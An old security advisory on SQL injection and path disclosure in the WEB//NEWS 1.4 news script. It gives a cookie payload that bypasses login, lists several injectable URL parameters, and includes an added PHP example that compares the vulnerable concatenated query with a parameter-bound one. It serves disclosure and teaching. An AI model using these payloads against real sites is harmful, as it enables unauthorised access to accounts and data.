Original text (English):

[NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4

=============================================================================



Software: WEB//NEWS 1.4

Type: SQL Injections, Path Disclosure

Risk: High



Date: Sep. 1 2005

Vendor: Stylemotion





Credit:

=======

Robin 'onkel_fisch' Verton

http://www.it-security23.net



Description:

============

WEB//News is a news script with CMS-like features.





Vulnerability:

==============



In modules/startup.php:



$_USER=$db->first("SELECT * FROM ".PRE."_user LEFT JOIN ".PRE."_group USING (groupid)
WHERE
( userid='".$_COOKIE['wn_userid']."' AND password='".$_COOKIE['wn_userpw']."' )
LIMIT 1");



As we can see, the $_COOKIE parameters are not checked before they are placed in the query. Below I've added how you have to set the cookies to take advantage of this vulnerability (send this to index.php):



wn_userid=1; wn_userpw=0' OR '1'='1
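The query pattern above next to a parameter-bound form, as an added example that is not part of the advisory or of the WEB//NEWS code. It assumes PDO with an in-memory SQLite database in place of the application's $db wrapper, "wn" as the value of PRE, and a constructed schema and user row; the function names are hypothetical. With the cookie values from the advisory, the concatenated lookup returns the first user row, while the bound lookup returns no row.

```php
<?php
// Added example: constructed schema and data, in-memory SQLite instead of the
// application's MySQL wrapper ($db->first). "wn" as the PRE prefix is an assumption.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE wn_group (groupid INTEGER PRIMARY KEY, groupname TEXT)");
$pdo->exec("CREATE TABLE wn_user (userid INTEGER PRIMARY KEY, password TEXT, groupid INTEGER)");
$pdo->exec("INSERT INTO wn_group VALUES (1, 'admin')");
$pdo->exec("INSERT INTO wn_user VALUES (1, 'constructed-hash-value', 1)");

// Pattern from modules/startup.php: cookie values are concatenated into the SQL
// text, so a quote inside a cookie changes the structure of the WHERE clause.
function lookup_concatenated(PDO $pdo, array $cookie): ?array {
    $sql = "SELECT * FROM wn_user LEFT JOIN wn_group USING (groupid) WHERE "
         . "( userid='" . $cookie['wn_userid'] . "' AND password='"
         . $cookie['wn_userpw'] . "' ) LIMIT 1";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Hardened form: the statement text is fixed and the cookie values are bound
// as data, after a type check that rejects arrays and non-numeric ids.
function lookup_bound(PDO $pdo, array $cookie): ?array {
    $id = $cookie['wn_userid'] ?? '';
    $pw = $cookie['wn_userpw'] ?? '';
    if (!is_string($id) || !ctype_digit($id) || !is_string($pw)) {
        return null;
    }
    $stmt = $pdo->prepare(
        "SELECT * FROM wn_user LEFT JOIN wn_group USING (groupid) "
        . "WHERE userid = :id AND password = :pw LIMIT 1");
    $stmt->execute([':id' => (int)$id, ':pw' => $pw]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Cookie values exactly as given in the advisory.
$cookie = ['wn_userid' => '1', 'wn_userpw' => "0' OR '1'='1"];
var_dump(lookup_concatenated($pdo, $cookie) !== null);
var_dump(lookup_bound($pdo, $cookie) !== null);
```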



Path Disclosure:

No file in the /actions directory checks whether it is being requested directly instead of being included.

Example:

/actions/cat.add.php?name=A



Almost no REQUEST variable is checked, so there are several SQL injections available.



A few Examples:

/include_this/news.php?cat=[SQL]

/include_this/news.php?id=[SQL]

/print.php?id=[SQL]

/include_this/news.php?stof=[SQL]



Greets:

==============

Whole NewAngel Team, CyberDead, Modhacker, deluxe

